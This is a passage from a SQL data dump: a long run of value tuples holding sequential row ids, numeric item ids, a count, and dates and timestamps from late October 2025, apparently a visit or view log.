11:38:01'),(93101,1604,1,'2025-10-24','2025-10-24 12:23:19'),(93102,68,1,'2025-10-24','2025-10-24 12:23:35'),(93103,5578,1,'2025-10-24','2025-10-24 12:30:55'),(93104,5317,1,'2025-10-24','2025-10-24 12:38:06'),(93105,5317,1,'2025-10-24','2025-10-24 12:38:18'),(93106,3724,1,'2025-10-24','2025-10-24 12:38:21'),(93107,4674,1,'2025-10-24','2025-10-24 13:10:40'),(93108,3534,1,'2025-10-24','2025-10-24 13:39:04'),(93109,3290,1,'2025-10-24','2025-10-24 13:39:45'),(93110,5323,1,'2025-10-24','2025-10-24 13:51:35'),(93111,4688,1,'2025-10-24','2025-10-24 14:05:10'),(93112,335,1,'2025-10-24','2025-10-24 14:16:48'),(93113,4703,1,'2025-10-24','2025-10-24 14:31:20'),(93114,4323,1,'2025-10-24','2025-10-24 14:38:04'),(93115,74,1,'2025-10-24','2025-10-24 15:00:39'),(93116,4681,1,'2025-10-24','2025-10-24 15:07:04'),(93117,3742,1,'2025-10-24','2025-10-24 15:41:24'),(93118,3721,1,'2025-10-24','2025-10-24 16:38:17'),(93119,3069,1,'2025-10-24','2025-10-24 16:38:28'),(93120,3749,1,'2025-10-24','2025-10-24 17:02:08'),(93121,2704,1,'2025-10-24','2025-10-24 17:11:48'),(93122,5433,1,'2025-10-24','2025-10-24 17:27:35'),(93123,5512,1,'2025-10-24','2025-10-24 17:35:39'),(93124,3721,1,'2025-10-24','2025-10-24 17:38:49'),(93125,4332,1,'2025-10-24','2025-10-24 17:42:39'),(93126,5454,1,'2025-10-24','2025-10-24 17:45:11'),(93127,2704,1,'2025-10-24','2025-10-24 18:01:18'),(93128,4963,1,'2025-10-24','2025-10-24 18:01:48'),(93129,87,1,'2025-10-24','2025-10-24 18:02:33'),(93130,4722,1,'2025-10-24','2025-10-24 18:03:32'),(93131,5406,1,'2025-10-24','2025-10-24 18:09:17'),(93132,3045,1,'2025-10-24','2025-10-24 18:24:52'),(93133,5295,1,'2025-10-24','2025-10-24 18:26:06'),(93134,3731,1,'2025-10-24','2025-10-24 18:28:52'),(93135,5436,1,'2025-10-24','2025-10-24 18:38:57'),(93136,4983,1,'2025-10-24','2025-10-24 18:51:44'),(93137,4681,1,'2025-10-24','2025-10-24 19:06:46'),(93138,3724,1,'2025-10-24','2025-10-24 19:18:51'),(93139,5248,1,'2025-10-24','2025-10-24 19:23:36'),(93140,2751,1,'2025-10-24','2025-10-24 19:25:53'),(93141,3313,1,'2025-10-24','2025-10-24 19:46:39'),(93142,4759,1,'2025-10-24','2025-10-24 19:53:27'),(93143,4960,1,'2025-10-24','2025-10-24 20:24:37'),(93144,89,1,'2025-10-24','2025-10-24 20:34:18'),(93145,3117,1,'2025-10-24','2025-10-24 20:45:25'),(93146,3066,1,'2025-10-24','2025-10-24 20:47:56'),(93147,3738,1,'2025-10-24','2025-10-24 20:49:23'),(93148,4368,1,'2025-10-24','2025-10-24 20:54:30'),(93149,4517,1,'2025-10-24','2025-10-24 21:41:29'),(93150,4454,1,'2025-10-24','2025-10-24 21:49:37'),(93151,3102,1,'2025-10-24','2025-10-24 21:50:49'),(93152,4765,1,'2025-10-24','2025-10-24 21:57:47'),(93153,4275,1,'2025-10-24','2025-10-24 22:21:01'),(93154,4357,1,'2025-10-24','2025-10-24 22:27:11'),(93155,1610,1,'2025-10-24','2025-10-24 22:38:37'),(93156,4514,1,'2025-10-24','2025-10-24 22:58:16'),(93157,4688,1,'2025-10-24','2025-10-24 23:03:15'),(93158,3316,1,'2025-10-24','2025-10-24 23:07:08'),(93159,3313,1,'2025-10-24','2025-10-24 23:19:41'),(93160,1722,1,'2025-10-24','2025-10-24 23:26:40'),(93161,5518,1,'2025-10-24','2025-10-24 23:57:29'),(93162,3090,1,'2025-10-25','2025-10-25 00:12:07'),(93163,1582,1,'2025-10-25','2025-10-25 00:31:52'),(93164,4551,1,'2025-10-25','2025-10-25 01:07:09'),(93165,91,1,'2025-10-25','2025-10-25 01:12:51'),(93166,1703,1,'2025-10-25','2025-10-25 01:41:45'),(93167,5512,1,'2025-10-25','2025-10-25 01:42:37'),(93168,3438,1,'2025-10-25','2025-10-25 02:46:58'),(93169,3746,1,'2025-10-25','2025-10-25 02:47:04'),(93170,3127,1,'2025-10-25','2025-10-25 02:52:26'),(93171,3777,1,'2025-10-25','2025-10-25 03:32:13'),(93172,4329,1,'2025-10-25','2025-10-25 03:57:11'),(93173,5330,1,'2025-10-25','2025-10-25 04:58:26'),(93174,4963,1,'2025-10-25','2025-10-25 05:23:09'),(93175,3249,1,'2025-10-25','2025-10-25 05:37:12'),(93176,91,1,'2025-10-25','2025-10-25 06:25:51'),(93177,3102,1,'2025-10-25','2025-10-25 07:28:50'),(93178,4950,1,'2025-10-25','2025-10-25 09:10:48'),(93179,4950,1,'2025-10-25','2025-10-25 09:27:50'),(93180,4983,1,'2025-10-25','2025-10-25 10:03:13'),(93181,1718,1,'2025-10-25','2025-10-25 10:15:26'),(93182,5454,1,'2025-10-25','2025-10-25 11:02:15'),(93183,1772,1,'2025-10-25','2025-10-25 11:52:26'),(93184,2993,1,'2025-10-25','2025-10-25 11:52:32'),(93185,1737,1,'2025-10-25','2025-10-25 11:55:36'),(93186,5578,1,'2025-10-25','2025-10-25 12:01:20'),(93187,2658,1,'2025-10-25','2025-10-25 12:02:51'),(93188,2152,1,'2025-10-25','2025-10-25 12:08:16'),(93189,3226,1,'2025-10-25','2025-10-25 12:08:23'),(93190,5005,1,'2025-10-25','2025-10-25 12:13:17'),(93191,1778,1,'2025-10-25','2025-10-25 12:17:02'),(93192,1699,1,'2025-10-25','2025-10-25 12:19:25'),(93193,5020,1,'2025-10-25','2025-10-25 12:27:27'),(93194,1713,1,'2025-10-25','2025-10-25 12:35:09'),(93195,3104,1,'2025-10-25','2025-10-25 12:39:04'),(93196,2293,1,'2025-10-25','2025-10-25 12:39:11'),(93197,4878,1,'2025-10-25','2025-10-25 12:54:20'),(93198,4694,1,'2025-10-25','2025-10-25 13:08:12'),(93199,3749,1,'2025-10-25','2025-10-25 13:22:16'),(93200,2989,1,'2025-10-25','2025-10-25 13:39:37'),(93201,3269,1,'2025-10-25','2025-10-25 13:40:27'),(93202,4275,1,'2025-10-25','2025-10-25 14:03:20'),(93203,2159,1,'2025-10-25','2025-10-25 14:40:24'),(93204,3251,1,'2025-10-25','2025-10-25 14:40:40'),(93205,5588,1,'2025-10-25','2025-10-25 15:09:42'),(93206,2309,1,'2025-10-25','2025-10-25 15:38:45'),(93207,4517,1,'2025-10-25','2025-10-25 16:15:42'),(93208,3006,1,'2025-10-25','2025-10-25 16:20:25'),(93209,5522,1,'2025-10-25','2025-10-25 16:37:23'),(93210,3541,1,'2025-10-25','2025-10-25 16:37:41'),(93211,1724,1,'2025-10-25','2025-10-25 18:41:32'),(93212,5397,1,'2025-10-25','2025-10-25 19:06:57'),(93213,5598,1,'2025-10-25','2025-10-25 19:10:27'),(93214,5515,1,'2025-10-25','2025-10-25 19:15:44'),(93215,3752,1,'2025-10-25','2025-10-25 19:26:43'),(93216,2063,1,'2025-10-25','2025-10-25 20:10:29'),(93217,1707,1,'2025-10-25','2025-10-25 21:02:21'),(93218,4400,1,'2025-10-25','2025-10-25 21:33:55'),(93219,1772,1,'2025-10-25','2025-10-25 21:38:19'),(93220,5489,1,'2025-10-25','2025-10-25 21:48:15'),(93221,4722,1,'2025-10-25','2025-10-25 21:51:51'),(93222,3117,1,'2025-10-25','2025-10-25 22:22:20'),(93223,2904,1,'2025-10-25','2025-10-25 22:35:41'),(93224,5561,1,'2025-10-25','2025-10-25 23:02:47'),(93225,5441,1,'2025-10-25','2025-10-25 23:09:57'),(93226,3287,1,'2025-10-26','2025-10-26 01:01:30'),(93227,3083,1,'2025-10-26','2025-10-26 01:40:50'),(93228,80,1,'2025-10-26','2025-10-26 01:41:09'),(93229,3240,1,'2025-10-26','2025-10-26 01:53:40'),(93230,5062,1,'2025-10-26','2025-10-26 02:15:56'),(93231,5539,1,'2025-10-26','2025-10-26 02:18:46'),(93232,4983,1,'2025-10-26','2025-10-26 02:50:11'),(93233,1751,1,'2025-10-26','2025-10-26 03:40:18'),(93234,5492,1,'2025-10-26','2025-10-26 04:25:15'),(93235,5549,1,'2025-10-26','2025-10-26 05:30:25'),(93236,1726,1,'2025-10-26','2025-10-26 05:36:18'),(93237,4368,1,'2025-10-26','2025-10-26 05:43:24'),(93238,5507,1,'2025-10-26','2025-10-26 06:33:16'),(93239,2965,1,'2025-10-26','2025-10-26 06:37:18'),(93240,1703,1,'2025-10-26','2025-10-26 06:37:25'),(93241,1602,1,'2025-10-26','2025-10-26 07:07:49'),(93242,1602,1,'2025-10-26','2025-10-26 07:07:51'),(93243,5457,1,'2025-10-26','2025-10-26 07:08:28'),(93244,5409,1,'2025-10-26','2025-10-26 07:14:47'),(93245,5406,1,'2025-10-26','2025-10-26 07:15:43'),(93246,1608,1,'2025-10-26','2025-10-26 07:18:20'),(93247,91,1,'2025-10-26','2025-10-26 07:23:37'),(93248,3691,1,'2025-10-26','2025-10-26 07:43:13'),(93249,1598,1,'2025-10-26','2025-10-26 09:54:34'),(93250,481,1,'2025-10-26','2025-10-26 10:34:13'),(93251,1588,1,'2025-10-26','2025-10-26 10:34:20'),(93252,1722,1,'2025-10-26','2025-10-26 10:36:20'),(93253,2911,1,'2025-10-26','2025-10-26 11:32:53'),(93254,3083,1,'2025-10-26','2025-10-26 12:18:58'),(93255,1718,1,'2025-10-26','2025-10-26 12:37:16'),(93256,2964,1,'2025-10-26','2025-10-26 13:35:33'),(93257,5276,1,'2025-10-26','2025-10-26 13:53:11'),(93258,4802,1,'2025-10-26','2025-10-26 14:20:14'),(93259,570,1,'2025-10-26','2025-10-26 16:34:51'),(93260,2178,1,'2025-10-26','2025-10-26 17:36:47'),(93261,5502,1,'2025-10-26','2025-10-26 17:49:30'),(93262,3307,1,'2025-10-26','2025-10-26 17:53:34'),(93263,4950,1,'2025-10-26','2025-10-26 18:03:42'),(93264,68,1,'2025-10-26','2025-10-26 18:04:12'),(93265,5573,1,'2025-10-26','2025-10-26 18:05:49'),(93266,3069,1,'2025-10-26','2025-10-26 18:18:53'),(93267,3034,1,'2025-10-26','2025-10-26 18:37:48'),(93268,476,1,'2025-10-26','2025-10-26 18:38:00'),(93269,3004,1,'2025-10-26','2025-10-26 18:38:09'),(93270,3253,1,'2025-10-26','2025-10-26 18:38:54'),(93271,488,1,'2025-10-26','2025-10-26 18:38:59'),(93272,5512,1,'2025-10-26','2025-10-26 19:29:32'),(93273,5457,1,'2025-10-26','2025-10-26 19:30:41'),(93274,80,1,'2025-10-26','2025-10-26 19:59:59'),(93275,4950,1,'2025-10-26','2025-10-26 20:09:29'),(93276,3307,1,'2025-10-26','2025-10-26 20:10:48'),(93277,5570,1,'2025-10-26','2025-10-26 20:35:06'),(93278,2558,1,'2025-10-26','2025-10-26 20:46:28'),(93279,4792,1,'2025-10-26','2025-10-26 21:06:37'),(93280,5454,1,'2025-10-26','2025-10-26 21:10:31'),(93281,3664,1,'2025-10-26','2025-10-26 21:45:10'),(93282,483,1,'2025-10-26','2025-10-26 21:49:46'),(93283,335,1,'2025-10-26','2025-10-26 22:02:41'),(93284,5425,1,'2025-10-26','2025-10-26 22:26:23'),(93285,5502,1,'2025-10-26','2025-10-26 22:48:32'),(93286,1586,1,'2025-10-26','2025-10-26 22:53:39'),(93287,4950,1,'2025-10-26','2025-10-26 23:06:13'),(93288,4950,1,'2025-10-26','2025-10-26 23:51:09'),(93289,1594,1,'2025-10-27','2025-10-27 00:45:59'),(93290,1608,1,'2025-10-27','2025-10-27 00:46:07'),(93291,1612,1,'2025-10-27','2025-10-27 00:48:51'),(93292,480,1,'2025-10-27','2025-10-27 00:50:27'),(93293,1544,1,'2025-10-27','2025-10-27 01:52:00'),(93294,5428,1,'2025-10-27','2025-10-27 02:30:26'),(93295,3038,1,'2025-10-27','2025-10-27 02:36:56'),(93296,1602,1,'2025-10-27','2025-10-27 02:49:57'),(93297,1594,1,'2025-10-27','2025-10-27 03:47:51'),(93298,5567,1,'2025-10-27','2025-10-27 03:56:50'),(93299,5561,1,'2025-10-27','2025-10-27 04:20:11'),(93300,3774,1,'2025-10-27','2025-10-27 05:20:53'),(93301,4950,1,'2025-10-27','2025-10-27 05:21:14'),(93302,3034,1,'2025-10-27','2025-10-27 07:28:03'),(93303,4520,1,'2025-10-27','2025-10-27 07:38:34'),(93304,91,1,'2025-10-27','2025-10-27 07:40:53'),(93305,5598,1,'2025-10-27','2025-10-27 09:08:43'),(93306,5397,1,'2025-10-27','2025-10-27 10:02:11'),(93307,1590,1,'2025-10-27','2025-10-27 10:15:13'),(93308,80,1,'2025-10-27','2025-10-27 10:20:26'),(93309,5406,1,'2025-10-27','2025-10-27 10:22:27'),(93310,72,1,'2025-10-27','2025-10-27 10:25:54'),(93311,5614,1,'2025-10-27','2025-10-27 10:28:51'),(93312,3694,1,'2025-10-27','2025-10-27 10:42:32'),(93313,3030,1,'2025-10-27','2025-10-27 10:42:53'),(93314,3038,1,'2025-10-27','2025-10-27 10:43:00'),(93315,3534,1,'2025-10-27','2025-10-27 10:55:56'),(93316,2813,1,'2025-10-27','2025-10-27 11:06:45'),(93317,5622,1,'2025-10-27','2025-10-27 11:09:47'),(93318,5618,1,'2025-10-27','2025-10-27 11:10:44'),(93319,5622,1,'2025-10-27','2025-10-27 11:16:52'),(93320,5461,1,'2025-10-27','2025-10-27 11:17:39'),(93321,5622,1,'2025-10-27','2025-10-27 11:25:15'),(93322,3175,1,'2025-10-27','2025-10-27 11:35:34'),(93323,1606,1,'2025-10-27','2025-10-27 11:35:45'),(93324,4400,1,'2025-10-27','2025-10-27 11:35:53'),(93325,5622,1,'2025-10-27','2025-10-27 11:36:14'),(93326,5618,1,'2025-10-27','2025-10-27 11:56:52'),(93327,1614,1,'2025-10-27','2025-10-27 12:32:23'),(93328,2156,1,'2025-10-27','2025-10-27 12:47:20'),(93329,5593,1,'2025-10-27','2025-10-27 13:13:05'),(93330,3027,1,'2025-10-27','2025-10-27 13:35:20'),(93331,4977,1,'2025-10-27','2025-10-27 14:05:14'),(93332,2704,1,'2025-10-27','2025-10-27 14:36:18'),(93333,4301,1,'2025-10-27','2025-10-27 14:36:27'),(93334,110,1,'2025-10-27','2025-10-27 14:51:49'),(93335,76,1,'2025-10-27','2025-10-27 15:35:42'),(93336,5464,1,'2025-10-27','2025-10-27 15:36:57'),(93337,3585,1,'2025-10-27','2025-10-27 15:38:38'),(93338,1608,1,'2025-10-27','2025-10-27 15:41:43'),(93339,4966,1,'2025-10-27','2025-10-27 15:53:59'),(93340,4712,1,'2025-10-27','2025-10-27 15:59:10'),(93341,2704,1,'2025-10-27','2025-10-27 16:34:51'),(93342,80,1,'2025-10-27','2025-10-27 16:35:22'),(93343,3704,1,'2025-10-27','2025-10-27 16:36:00'),(93344,3673,1,'2025-10-27','2025-10-27 17:40:30'),(93345,5449,1,'2025-10-27','2025-10-27 18:12:57'),(93346,5461,1,'2025-10-27','2025-10-27 18:30:40'),(93347,1586,1,'2025-10-27','2025-10-27 18:35:44'),(93348,3307,1,'2025-10-27','2025-10-27 19:00:28'),(93349,3781,1,'2025-10-27','2025-10-27 19:20:01'),(93350,3083,1,'2025-10-27','2025-10-27 19:58:04'),(93351,5515,1,'2025-10-27','2025-10-27 19:58:15'),(93352,5433,1,'2025-10-27','2025-10-27 20:07:33'),(93353,3752,1,'2025-10-27','2025-10-27 20:13:50'),(93354,4329,1,'2025-10-27','2025-10-27 20:52:07'),(93355,3180,1,'2025-10-27','2025-10-27 20:54:19'),(93356,4551,1,'2025-10-27','2025-10-27 20:55:08'),(93357,4709,1,'2025-10-27','2025-10-27 20:55:16'),(93358,5512,1,'2025-10-27','2025-10-27 21:16:59'),(93359,3486,1,'2025-10-27','2025-10-27 21:38:48'),(93360,3706,1,'2025-10-27','2025-10-27 21:50:19'),(93361,4765,1,'2025-10-27','2025-10-27 21:51:28'),(93362,72,1,'2025-10-27','2025-10-27 21:51:35'),(93363,4660,1,'2025-10-27','2025-10-27 21:58:05'),(93364,5454,1,'2025-10-27','2025-10-27 22:22:17'),(93365,5449,1,'2025-10-27','2025-10-27 22:53:09'),(93366,4706,1,'2025-10-27','2025-10-27 22:54:55'),(93367,5601,1,'2025-10-27','2025-10-27 23:10:49'),(93368,5489,1,'2025-10-27','2025-10-27 23:45:42'),(93369,3486,1,'2025-10-28','2025-10-28 00:12:09'),(93370,4400,1,'2025-10-28','2025-10-28 00:23:17'),(93371,84,1,'2025-10-28','2025-10-28 00:26:05'),(93372,2165,1,'2025-10-28','2025-10-28 00:26:42'),(93373,4768,1,'2025-10-28','2025-10-28 01:03:51'),(93374,5489,1,'2025-10-28','2025-10-28 01:14:55'),(93375,4608,1,'2025-10-28','2025-10-28 01:16:15'),(93376,5406,1,'2025-10-28','2025-10-28 02:21:18'),(93377,3705,1,'2025-10-28','2025-10-28 02:53:36'),(93378,2704,1,'2025-10-28','2025-10-28 03:02:36'),(93379,2813,1,'2025-10-28','2025-10-28 03:30:39'),(93380,3038,1,'2025-10-28','2025-10-28 03:32:14'),(93381,5409,1,'2025-10-28','2025-10-28 03:32:25'),(93382,3680,1,'2025-10-28','2025-10-28 03:38:37'),(93383,5567,1,'2025-10-28','2025-10-28 04:17:21'),(93384,4357,1,'2025-10-28','2025-10-28 04:48:52'),(93385,4785,1,'2025-10-28','2025-10-28 04:49:28'),(93386,1776,1,'2025-10-28','2025-10-28 04:49:35'),(93387,1747,1,'2025-10-28','2025-10-28 04:49:51'),(93388,4830,1,'2025-10-28','2025-10-28 04:52:52'),(93389,4436,1,'2025-10-28','2025-10-28 04:53:03'),(93390,1582,1,'2025-10-28','2025-10-28 05:04:37'),(93391,2165,1,'2025-10-28','2025-10-28 05:45:21'),(93392,471,1,'2025-10-28','2025-10-28 05:50:43'),(93393,4387,1,'2025-10-28','2025-10-28 05:50:57'),(93394,2420,1,'2025-10-28','2025-10-28 05:51:13'),(93395,2813,1,'2025-10-28','2025-10-28 06:41:04'),(93396,486,1,'2025-10-28','2025-10-28 06:42:19'),(93397,3053,1,'2025-10-28','2025-10-28 06:42:26'),(93398,3790,1,'2025-10-28','2025-10-28 06:42:34'),(93399,487,1,'2025-10-28','2025-10-28 06:44:58'),(93400,4977,1,'2025-10-28','2025-10-28 06:51:31'),(93401,5598,1,'2025-10-28','2025-10-28 07:17:55'),(93402,2813,1,'2025-10-28','2025-10-28 07:31:31'),(93403,91,1,'2025-10-28','2025-10-28 08:20:29'),(93404,5323,1,'2025-10-28','2025-10-28 08:24:31'),(93405,480,1,'2025-10-28','2025-10-28 08:42:16'),(93406,2150,1,'2025-10-28','2025-10-28 08:48:49'),(93407,4719,1,'2025-10-28','2025-10-28 08:48:54'),(93408,4368,1,'2025-10-28','2025-10-28 08:49:00'),(93409,1743,1,'2025-10-28','2025-10-28 08:49:05'),(93410,89,1,'2025-10-28','2025-10-28 09:19:12'),(93411,5436,1,'2025-10-28','2025-10-28 09:21:02'),(93412,5292,1,'2025-10-28','2025-10-28 09:22:57'),(93413,1739,1,'2025-10-28','2025-10-28 09:48:34'),(93414,4348,1,'2025-10-28','2025-10-28 09:48:48'),(93415,467,1,'2025-10-28','2025-10-28 09:49:01'),(93416,5420,1,'2025-10-28','2025-10-28 10:05:23'),(93417,3489,1,'2025-10-28','2025-10-28 10:16:41'),(93418,4668,1,'2025-10-28','2025-10-28 10:18:56'),(93419,4520,1,'2025-10-28','2025-10-28 10:27:23'),(93420,4496,1,'2025-10-28','2025-10-28 10:44:05'),(93421,4432,1,'2025-10-28','2025-10-28 10:48:05'),(93422,1586,1,'2025-10-28','2025-10-28 10:55:12'),(93423,80,1,'2025-10-28','2025-10-28 10:56:56'),(93424,68,1,'2025-10-28','2025-10-28 11:29:48'),(93425,5334,1,'2025-10-28','2025-10-28 11:34:16'),(93426,3788,1,'2025-10-28','2025-10-28 11:39:49'),(93427,2395,1,'2025-10-28','2025-10-28 11:44:39'),(93428,68,1,'2025-10-28','2025-10-28 11:44:55'),(93429,4498,1,'2025-10-28','2025-10-28 11:45:09'),(93430,5502,1,'2025-10-28','2025-10-28 11:51:27'),(93431,5492,1,'2025-10-28','2025-10-28 12:07:17'),(93432,4681,1,'2025-10-28','2025-10-28 12:25:14'),(93433,2617,1,'2025-10-28','2025-10-28 12:29:31'),(93434,4712,1,'2025-10-28','2025-10-28 12:32:28'),(93435,3006,1,'2025-10-28','2025-10-28 12:38:00'),(93436,2419,1,'2025-10-28','2025-10-28 12:40:15'),(93437,2503,1,'2025-10-28','2025-10-28 12:40:45'),(93438,5464,1,'2025-10-28','2025-10-28 13:02:27'),(93439,3275,1,'2025-10-28','2025-10-28 13:38:42'),(93440,106,1,'2025-10-28','2025-10-28 13:38:52'),(93441,468,1,'2025-10-28','2025-10-28 13:41:02'),(93442,467,1,'2025-10-28','2025-10-28 13:44:32'),(93443,76,1,'2025-10-28','2025-10-28 14:01:38'),(93444,5128,1,'2025-10-28','2025-10-28 14:14:22'),(93445,4747,1,'2025-10-28','2025-10-28 14:15:31'),(93446,4691,1,'2025-10-28','2025-10-28 14:20:02'),(93447,1582,1,'2025-10-28','2025-10-28 14:34:10'),(93448,4837,1,'2025-10-28','2025-10-28 14:37:27'),(93449,477,1,'2025-10-28','2025-10-28 14:37:42'),(93450,102,1,'2025-10-28','2025-10-28 14:38:27'),(93451,110,1,'2025-10-28','2025-10-28 14:38:43'),(93452,4835,1,'2025-10-28','2025-10-28 14:38:57'),(93453,1872,1,'2025-10-28','2025-10-28 14:44:10'),(93454,5137,1,'2025-10-28','2025-10-28 15:01:35'),(93455,1745,1,'2025-10-28','2025-10-28 15:14:09'),(93456,4344,1,'2025-10-28','2025-10-28 15:49:30'),(93457,4546,1,'2025-10-28','2025-10-28 15:55:07'),(93458,3267,1,'2025-10-28','2025-10-28 15:55:21'),(93459,4802,1,'2025-10-28','2025-10-28 15:55:29'),(93460,4842,1,'2025-10-28','2025-10-28 15:55:36'),(93461,87,1,'2025-10-28','2025-10-28 16:01:50'),(93462,3735,1,'2025-10-28','2025-10-28 16:06:29'),(93463,3245,1,'2025-10-28','2025-10-28 17:01:19'),(93464,4779,1,'2025-10-28','2025-10-28 17:01:32'),(93465,4444,1,'2025-10-28','2025-10-28 17:01:37'),(93466,4428,1,'2025-10-28','2025-10-28 17:01:46'),(93467,1598,1,'2025-10-28','2025-10-28 17:01:57'),(93468,4729,1,'2025-10-28','2025-10-28 17:02:05'),(93469,3263,1,'2025-10-28','2025-10-28 17:02:23'),(93470,3787,1,'2025-10-28','2025-10-28 17:08:03'),(93471,2178,1,'2025-10-28','2025-10-28 17:11:58'),(93472,3735,1,'2025-10-28','2025-10-28 17:24:38'),(93473,4694,1,'2025-10-28','2025-10-28 17:27:07'),(93474,5037,1,'2025-10-28','2025-10-28 17:28:16'),(93475,1709,1,'2025-10-28','2025-10-28 17:30:38'),(93476,3055,1,'2025-10-28','2025-10-28 17:49:13'),(93477,4792,1,'2025-10-28','2025-10-28 17:50:35'),(93478,4733,1,'2025-10-28','2025-10-28 17:50:44'),(93479,2775,1,'2025-10-28','2025-10-28 17:52:36'),(93480,1592,1,'2025-10-28','2025-10-28 18:08:09'),(93481,4685,1,'2025-10-28','2025-10-28 18:28:14'),(93482,1732,1,'2025-10-28','2025-10-28 18:46:33'),(93483,3058,1,'2025-10-28','2025-10-28 18:50:10'),(93484,1584,1,'2025-10-28','2025-10-28 18:50:25'),(93485,72,1,'2025-10-28','2025-10-28 18:51:30'),(93486,2971,1,'2025-10-28','2025-10-28 18:51:40'),(93487,4494,1,'2025-10-28','2025-10-28 18:55:43'),(93488,3178,1,'2025-10-28','2025-10-28 18:55:49'),(93489,5397,1,'2025-10-28','2025-10-28 19:27:40'),(93490,4950,1,'2025-10-28','2025-10-28 20:02:14'),(93491,3261,1,'2025-10-28','2025-10-28 20:03:23'),(93492,4448,1,'2025-10-28','2025-10-28 20:03:35'),(93493,4950,1,'2025-10-28','2025-10-28 20:28:23'),(93494,5310,1,'2025-10-28','2025-10-28 20:29:53'),(93495,4238,1,'2025-10-28','2025-10-28 20:57:44'),(93496,3041,1,'2025-10-28','2025-10-28 20:57:52'),(93497,1586,1,'2025-10-28','2025-10-28 21:17:27'),(93498,5457,1,'2025-10-28','2025-10-28 21:17:40'),(93499,5307,1,'2025-10-28','2025-10-28 21:25:18'),(93500,5259,1,'2025-10-28','2025-10-28 21:26:51'),(93501,3005,1,'2025-10-28','2025-10-28 21:51:49'),(93502,335,1,'2025-10-28','2025-10-28 21:52:03'),(93503,4424,1,'2025-10-28','2025-10-28 21:52:27'),(93504,478,1,'2025-10-28','2025-10-28 21:52:50'),(93505,5570,1,'2025-10-28','2025-10-28 22:09:05'),(93506,484,1,'2025-10-28','2025-10-28 22:10:53'),(93507,4747,1,'2025-10-28','2025-10-28 22:45:02'),(93508,2991,1,'2025-10-28','2025-10-28 23:02:54'),(93509,5489,1,'2025-10-28','2025-10-28 23:17:08'),(93510,5605,1,'2025-10-28','2025-10-28 23:23:46'),(93511,5605,1,'2025-10-28','2025-10-28 23:23:49'),(93512,4529,1,'2025-10-28','2025-10-28 23:37:44'),(93513,5409,1,'2025-10-28','2025-10-28 23:43:30'),(93514,1722,1,'2025-10-28','2025-10-28 23:43:36'),(93515,4420,1,'2025-10-28','2025-10-28 23:57:10'),(93516,5317,1,'2025-10-29','2025-10-29 00:26:47'),(93517,4950,1,'2025-10-29','2025-10-29 00:44:26'),(93518,4363,1,'2025-10-29','2025-10-29 00:57:23'),(93519,4408,1,'2025-10-29','2025-10-29 00:57:39'),(93520,1604,1,'2025-10-29','2025-10-29 00:57:44'),(93521,2804,1,'2025-10-29','2025-10-29 01:05:29'),(93522,4373,1,'2025-10-29','2025-10-29 01:23:19'),(93523,5412,1,'2025-10-29','2025-10-29 01:41:47'),(93524,4382,1,'2025-10-29','2025-10-29 02:01:02'),(93525,4797,1,'2025-10-29','2025-10-29 02:01:10'),(93526,2609,1,'2025-10-29','2025-10-29 02:02:10'),(93527,4827,1,'2025-10-29','2025-10-29 02:02:16'),(93528,4440,1,'2025-10-29','2025-10-29 02:02:27'),(93529,1582,1,'2025-10-29','2025-10-29 02:03:55'),(93530,4960,1,'2025-10-29','2025-10-29 02:11:36'),(93531,3117,1,'2025-10-29','2025-10-29 02:17:38'),(93532,2904,1,'2025-10-29','2025-10-29 02:32:15'),(93533,4492,1,'2025-10-29','2025-10-29 02:54:12'),(93534,4377,1,'2025-10-29','2025-10-29 02:54:23'),(93535,2904,1,'2025-10-29','2025-10-29 02:54:33'),(93536,4508,1,'2025-10-29','2025-10-29 02:54:43'),(93537,1600,1,'2025-10-29','2025-10-29 02:54:59'),(93538,1728,1,'2025-10-29','2025-10-29 02:55:10'),(93539,5428,1,'2025-10-29','2025-10-29 02:55:13'),(93540,5441,1,'2025-10-29','2025-10-29 03:07:20'),(93541,5125,1,'2025-10-29','2025-10-29 03:08:23'),(93542,2813,1,'2025-10-29','2025-10-29 03:10:20'),(93543,3714,1,'2025-10-29','2025-10-29 03:19:54'),(93544,3229,1,'2025-10-29','2025-10-29 03:25:07'),(93545,4700,1,'2025-10-29','2025-10-29 03:25:40'),(93546,2813,1,'2025-10-29','2025-10-29 03:27:07'),(93547,4485,1,'2025-10-29','2025-10-29 03:44:38'),(93548,2617,1,'2025-10-29','2025-10-29 03:46:25'),(93549,3045,1,'2025-10-29','2025-10-29 03:48:54'),(93550,4657,1,'2025-10-29','2025-10-29 04:25:10'),(93551,4645,1,'2025-10-29','2025-10-29 04:25:30'),(93552,4753,1,'2025-10-29','2025-10-29 05:21:58'),(93553,4756,1,'2025-10-29','2025-10-29 05:22:07'),(93554,72,1,'2025-10-29','2025-10-29 05:22:15'),(93555,5618,1,'2025-10-29','2025-10-29 05:24:19'),(93556,5622,1,'2025-10-29','2025-10-29 05:24:27'),(93557,5614,1,'2025-10-29','2025-10-29 05:24:33'),(93558,3727,1,'2025-10-29','2025-10-29 05:24:45'),(93559,4983,1,'2025-10-29','2025-10-29 06:22:14'),(93560,4566,1,'2025-10-29','2025-10-29 06:23:28'),(93561,2813,1,'2025-10-29','2025-10-29 06:31:02'),(93562,1582,1,'2025-10-29','2025-10-29 06:36:01'),(93563,87,1,'2025-10-29','2025-10-29 06:55:38'),(93564,4950,1,'2025-10-29','2025-10-29 07:19:56'),(93565,3251,1,'2025-10-29','2025-10-29 07:28:19'),(93566,5549,1,'2025-10-29','2025-10-29 07:39:47'),(93567,110,1,'2025-10-29','2025-10-29 07:49:24'),(93568,3063,1,'2025-10-29','2025-10-29 08:10:45'),(93569,3731,1,'2025-10-29','2025-10-29 08:41:08'),(93570,2813,1,'2025-10-29','2025-10-29 08:42:00'),(93571,3764,1,'2025-10-29','2025-10-29 08:46:13'),(93572,3721,1,'2025-10-29','2025-10-29 09:02:29'),(93573,3430,1,'2025-10-29','2025-10-29 09:08:35'),(93574,3290,1,'2025-10-29','2025-10-29 09:19:13'),(93575,5464,1,'2025-10-29','2025-10-29 09:20:47'),(93576,3090,1,'2025-10-29','2025-10-29 09:21:12'),(93577,91,1,'2025-10-29','2025-10-29 09:47:24'),(93578,5605,1,'2025-10-29','2025-10-29 10:21:59'),(93579,4771,1,'2025-10-29','2025-10-29 10:25:49'),(93580,4759,1,'2025-10-29','2025-10-29 10:33:01'),(93581,2813,1,'2025-10-29','2025-10-29 10:58:18'),(93582,5605,1,'2025-10-29','2025-10-29 11:14:34'),(93583,3127,1,'2025-10-29','2025-10-29 11:31:56'),(93584,2395,1,'2025-10-29','2025-10-29 11:33:51'),(93585,5605,1,'2025-10-29','2025-10-29 